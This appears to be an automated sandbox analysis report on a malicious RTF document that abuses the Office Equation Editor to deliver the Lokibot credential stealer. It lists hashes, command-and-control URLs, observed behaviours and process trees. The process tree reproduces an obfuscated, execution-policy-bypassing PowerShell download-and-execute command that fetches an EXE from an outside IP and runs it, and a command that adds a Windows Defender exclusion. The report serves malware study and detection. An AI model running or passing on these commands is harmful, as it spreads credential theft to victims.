Analysis
-
max time kernel
96s -
max time network
97s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 10:07
Static task
static1
Behavioral task
behavioral1
Sample
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
Resource
win10v2004-20241007-en
General
-
Target
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
-
Size
251KB
-
MD5
e6859034a42f217800b6bf0980e93848
-
SHA1
8dcb69dcf727b7a7fbfbf6755492990dc51fd192
-
SHA256
564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
-
SHA512
778ceefc76571268a7c82c18ec1b6f6661b4f696d2612528b8eb94488383c84c9dba6613cd5b1c715514e64d062d73d28d84395f30dadb4fd2da51cbac372d35
-
SSDEEP
3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2804 EQNEDT32.EXE 6 2792 poWERShell.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2272 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 668 powershell.exe 2792 poWERShell.eXe -
Executes dropped EXE 3 IoCs
pid Process 2680 wininit.exe 2216 wininit.exe 2316 wininit.exe -
Loads dropped DLL 3 IoCs
pid Process 2792 poWERShell.eXe 2792 poWERShell.eXe 2792 poWERShell.eXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk poWERShell.eXe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2680 set thread context of 2316 2680 wininit.exe 43 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERShell.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2804 EQNEDT32.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2324 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2792 poWERShell.eXe 668 powershell.exe 2680 wininit.exe 2680 wininit.exe 2272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2792 poWERShell.eXe Token: SeDebugPrivilege 668 powershell.exe Token: SeDebugPrivilege 2680 wininit.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeDebugPrivilege 2316 wininit.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2324 WINWORD.EXE 2324 WINWORD.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2804 wrote to memory of 2816 2804 EQNEDT32.EXE 30 PID 2804 wrote to memory of 2816 2804 EQNEDT32.EXE 30 PID 2804 wrote to memory of 2816 2804 EQNEDT32.EXE 30 PID 2804 wrote to memory of 2816 2804 EQNEDT32.EXE 30 PID 2816 wrote to memory of 2792 2816 mshta.exe 32 PID 2816 wrote to memory of 2792 2816 mshta.exe 32 PID 2816 wrote to memory of 2792 2816 mshta.exe 32 PID 2816 wrote to memory of 2792 2816 mshta.exe 32 PID 2792 wrote to memory of 668 2792 poWERShell.eXe 34 PID 2792 wrote to memory of 668 2792 poWERShell.eXe 34 PID 2792 wrote to memory of 668 2792 poWERShell.eXe 34 PID 2792 wrote to memory of 668 2792 poWERShell.eXe 34 PID 2792 wrote to memory of 2160 2792 poWERShell.eXe 35 PID 2792 wrote to memory of 2160 2792 poWERShell.eXe 35 PID 2792 wrote to memory of 2160 2792 poWERShell.eXe 35 PID 2792 wrote to memory of 2160 2792 poWERShell.eXe 35 PID 2160 wrote to memory of 2384 2160 csc.exe 36 PID 2160 wrote to memory of 2384 2160 csc.exe 36 PID 2160 wrote to memory of 2384 2160 csc.exe 36 PID 2160 wrote to memory of 2384 2160 csc.exe 36 PID 2792 wrote to memory of 2680 2792 poWERShell.eXe 38 PID 2792 wrote to memory of 2680 2792 poWERShell.eXe 38 PID 2792 wrote to memory of 2680 2792 poWERShell.eXe 38 PID 2792 wrote to memory of 2680 2792 poWERShell.eXe 38 PID 2324 wrote to memory of 2172 2324 WINWORD.EXE 39 PID 2324 wrote to memory of 2172 2324 WINWORD.EXE 39 PID 2324 wrote to memory of 2172 2324 WINWORD.EXE 39 PID 2324 wrote to memory of 2172 2324 WINWORD.EXE 39 PID 2680 wrote to memory of 2272 2680 wininit.exe 40 PID 2680 wrote to memory of 2272 2680 wininit.exe 40 PID 2680 wrote to memory of 2272 2680 wininit.exe 40 PID 2680 wrote to memory of 2272 2680 wininit.exe 40 PID 2680 wrote to memory of 2216 2680 wininit.exe 42 PID 2680 wrote to memory of 2216 2680 wininit.exe 42 PID 2680 wrote to memory of 2216 2680 wininit.exe 42 PID 2680 wrote to memory of 2216 2680 wininit.exe 42 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 PID 2680 wrote to memory of 2316 2680 wininit.exe 43 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2172
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt4⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\curq-f5c.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4442.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4441.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2384
-
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Executes dropped EXE
PID:2216
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2316
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Exploitation for Client Execution
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD537a082c418019dab90c73c62b2f491ac
SHA1f4bb4f3c092bb532bafa9e8cee0b62ba1ee08b9d
SHA256448fb02400e6a4130e93391e3382889fa27652a2a55e0aabbfbbcb2cd4a0b4f9
SHA512bc027163ea30d0172c749d4cbcb45991c311a750222c3c3ce1dea8787de49cfc911f7a3050fe673a816845c8de0be169789c0f54c2d8316dc680095d6d4db513
-
Filesize
3KB
MD59741027684526df318fb6cbc34152270
SHA1e6da86e69f250a0f4264485271411f8dc0eb6d42
SHA256bf9814b102c69336758a1c1ecca01d17a4668c8eaffdf8c5ce8dfe14029bd77c
SHA512ec37a8205b3eda5c6c1195b5488b7d627e100af9c8e0851ea6d052a4301d3871047199b29334e4a2def39630d834627d2e601f4391333a506b726fd4fb23c910
-
Filesize
7KB
MD5b070ed12fb29d73958e9d02a423bcadc
SHA11413372a191113d7c3294216c865d5e44981fa5f
SHA256990a34da9770d2d6bc45bb415577b080f9367d66d9c770def95f73a908937c6c
SHA51289c437de87d72b61fafcc5a3a327b41070a795731de5a66e8ba6b383e53ecc66060de82bb3a4fb72f677fc8dd449cf5f0ceac2c738b6d40a8d770208d3642664
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD503e17db36bc1693d064de4cf63581457
SHA13465c05785b085f1ed6b679ae9c3e312e0008063
SHA25669e2b7a3c968300d3602965071212566f642ae6029df19941c1117e1233ea5a2
SHA5126381e686e3e298a8485f9baa9c76a2cdc11fae302c4ab67204c094a8a5cc98bae463cf8119aa975ccf732bc52e11955e985a971fc4fae9ccb0ee1002da8be4bb
-
Filesize
23KB
MD5ec0d423a3f72d69975a1e31a275f5377
SHA1213922fb8456ecaadc24889afec1ac6ef5010c68
SHA2569fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA5128132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
-
Filesize
586KB
MD566b03d1aff27d81e62b53fc108806211
SHA12557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA25659586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA5129f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d
-
Filesize
652B
MD55091533375d13f175bab9e33d32d0746
SHA16c2fe722c6f49941fef8587731a5b75a6d741240
SHA2569723e2318ca7bbbe283986e88c6e7a9f56c5ecde31fec1bd9f86b3056faf1433
SHA5123a851023e7af7b5cc6e9b453ffe8e487615614a258beb6daf682cfd97e117a0361f67ae15fa91a46d211a385f6915b0dac17aca2cc974c0db8c0956856627b65
-
Filesize
480B
MD5b0517586f4097114e790c61f2685f0d5
SHA120f7482298ab96731228ebd5242ceddfd72ff50f
SHA256a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0
-
Filesize
309B
MD51f11c4bfa922eee65bf95da0ed33f809
SHA11841382b9d8c7faf90eb0428d6b730659b30cb87
SHA2567657cc7a09fbf56f1399a8a8e8cd802b5e9c646da408eb01a02f32728ad3c341
SHA51289908271f1858328d66f1ba132d61a1719f2e6c29b2d2cbfe32938aff7510a64063d348a3292c5f68dae8a5c34beb3d9e4fc9c0e3161b33f1262f1142704fa7a